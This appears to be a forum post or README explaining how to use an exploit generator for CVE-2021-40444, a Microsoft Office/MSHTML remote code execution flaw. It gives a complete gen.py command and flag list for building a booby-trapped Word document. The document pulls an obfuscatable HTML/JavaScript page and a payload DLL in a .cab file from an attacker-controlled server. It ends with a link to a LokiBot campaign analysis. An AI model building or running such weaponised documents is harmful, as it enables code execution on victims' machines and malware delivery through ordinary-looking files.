CVE-2021-40444
Usage
Ensure to run setup.sh first as you will need few directories. Once you have run the script, you should be able to run gen.py with the example given:
Code:
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosityNotes
- The location of http.server will be in web directory. This directory will have 3 files:-
- .cab
- .html
- .docx
boom!...
for better understanding:
LokiBot Campaign Targets Microsoft Office Document Using Vulnerabilities and Macros | FortiGuard Labs
FortiGuard Labs investigates malicious Microsoft Office documents that dropped the LokiBot malware onto a victim's system. Get an analysis of the intricacies of this threat and awareness of its ope…
----------------------------------------------------------------------------
Link:
